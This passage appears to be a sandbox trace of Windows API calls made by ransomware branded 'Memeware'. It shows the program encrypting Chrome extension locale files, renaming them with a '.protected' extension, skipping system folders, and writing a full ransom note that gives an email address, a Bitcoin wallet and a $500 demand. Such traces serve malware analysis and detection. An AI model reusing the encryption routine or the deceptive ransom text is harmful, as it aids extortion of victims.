Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fil\\messages.json.protected") returned 166 [0078.701] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fil\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fil\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fil\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fil\\messages.json.protected")) returned 1 [0078.701] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0078.701] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0078.702] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fil\\RESTORE_FILES.txt") returned 160 [0078.702] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fil\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fil\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0078.702] lstrlenA 
(lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0078.702] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0078.703] lstrlenA (lpString="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") returned 684 [0078.703] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) 
returned 1 [0078.703] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0078.703] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0078.703] CloseHandle (hObject=0x164) returned 1 [0078.703] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0078.703] lstrcmpiW (lpString1="fr", lpString2="Windows") returned -1 [0078.703] lstrcmpiW (lpString1="fr", lpString2="Program Files") returned -1 [0078.703] lstrcmpiW (lpString1="fr", lpString2="Program Files (x86)") returned -1 [0078.703] lstrcmpiW (lpString1="fr", lpString2="$Recycle.bin") returned 1 [0078.703] lstrcmpiW (lpString1="fr", lpString2="System Volume Information") returned -1 [0078.703] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fr") returned 141 [0078.704] lstrcmpW (lpString1="fr", lpString2=".") returned 1 [0078.704] lstrcmpW (lpString1="fr", lpString2="..") returned 1 [0078.704] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fr\\*") returned 143 [0078.704] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fr\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0078.704] 
lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0078.704] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0078.704] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0078.704] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0078.704] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0078.704] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fr\\.") returned 143 [0078.704] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0078.704] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0078.704] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0078.704] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0078.704] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0078.704] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0078.704] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0078.704] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fr\\..") returned 144 [0078.704] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0078.704] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0078.704] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0078.704] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0078.704] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0078.704] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned 
-1 [0078.705] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0078.705] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0078.705] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fr\\messages.json") returned 155 [0078.705] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0078.705] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0078.705] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0078.705] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0078.705] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fr\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0078.705] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fr\\messages.json") returned 155 [0078.705] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0078.705] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fr\\messages.json") returned 155 [0078.705] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0078.705] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fr\\messages.json") returned 155 [0078.705] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0078.705] ReadFile (in: hFile=0x168, lpBuffer=0xd12130, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd12130*, lpNumberOfBytesRead=0x295d914*=0xde, lpOverlapped=0x0) returned 1 [0078.706] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff22, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.706] WriteFile (in: hFile=0x168, lpBuffer=0xd12130*, nNumberOfBytesToWrite=0xde, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd12130*, lpNumberOfBytesWritten=0x295d914*=0xde, lpOverlapped=0x0) returned 1 [0078.706] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.707] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0078.707] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0078.707] CloseHandle (hObject=0x168) returned 1 [0078.707] wnsprintfW (in: pszDest=0xd12130, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fr\\messages.json.protected") returned 165 [0078.707] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fr\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fr\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fr\\messages.json.protected")) returned 1 [0078.707] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0078.708] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0078.708] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fr\\RESTORE_FILES.txt") returned 159 [0078.708] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fr\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fr\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0078.708] lstrlenA 
(lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0078.708] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0078.709] lstrlenA 
(lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0078.709] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0078.709] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0078.709] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0078.709] CloseHandle (hObject=0x164) returned 1 [0078.710] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0078.710] lstrcmpiW (lpString1="he", lpString2="Windows") returned -1 [0078.710] lstrcmpiW (lpString1="he", lpString2="Program Files") returned -1 [0078.710] lstrcmpiW (lpString1="he", lpString2="Program Files (x86)") returned -1 [0078.710] lstrcmpiW (lpString1="he", lpString2="$Recycle.bin") returned 1 [0078.710] lstrcmpiW (lpString1="he", lpString2="System Volume Information") returned -1 [0078.710] wnsprintfW 
(in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\he") returned 141 [0078.710] lstrcmpW (lpString1="he", lpString2=".") returned 1 [0078.710] lstrcmpW (lpString1="he", lpString2="..") returned 1 [0078.710] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\he\\*") returned 143 [0078.710] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\he\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0078.711] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0078.711] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0078.711] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0078.711] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0078.711] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0078.711] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\he\\.") returned 143 [0078.711] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0078.711] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0078.711] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0078.711] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0078.711] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0078.711] 
lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0078.711] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0078.711] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\he\\..") returned 144 [0078.711] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0078.711] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0078.711] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0078.711] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0078.711] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0078.711] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0078.711] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0078.711] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0078.711] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\he\\messages.json") returned 155 [0078.711] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0078.712] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0078.712] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0078.712] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0078.712] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\he\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\he\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0078.712] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\he\\messages.json") returned 155 [0078.712] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0078.712] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\he\\messages.json") returned 155 [0078.712] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0078.712] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\he\\messages.json") returned 155 [0078.712] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0078.712] ReadFile (in: hFile=0x168, lpBuffer=0xd12130, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd12130*, lpNumberOfBytesRead=0x295d914*=0xe1, lpOverlapped=0x0) returned 1 [0078.713] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff1f, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.713] WriteFile (in: hFile=0x168, lpBuffer=0xd12130*, nNumberOfBytesToWrite=0xe1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd12130*, lpNumberOfBytesWritten=0x295d914*=0xe1, lpOverlapped=0x0) returned 1 [0078.713] SetFilePointerEx (in: hFile=0x168, 
liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.713] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0078.714] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0078.714] CloseHandle (hObject=0x168) returned 1 [0078.714] wnsprintfW (in: pszDest=0xd12130, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\he\\messages.json.protected") returned 165 [0078.714] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\he\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\he\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\he\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\he\\messages.json.protected")) returned 1 [0078.714] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0078.714] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0078.715] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: 
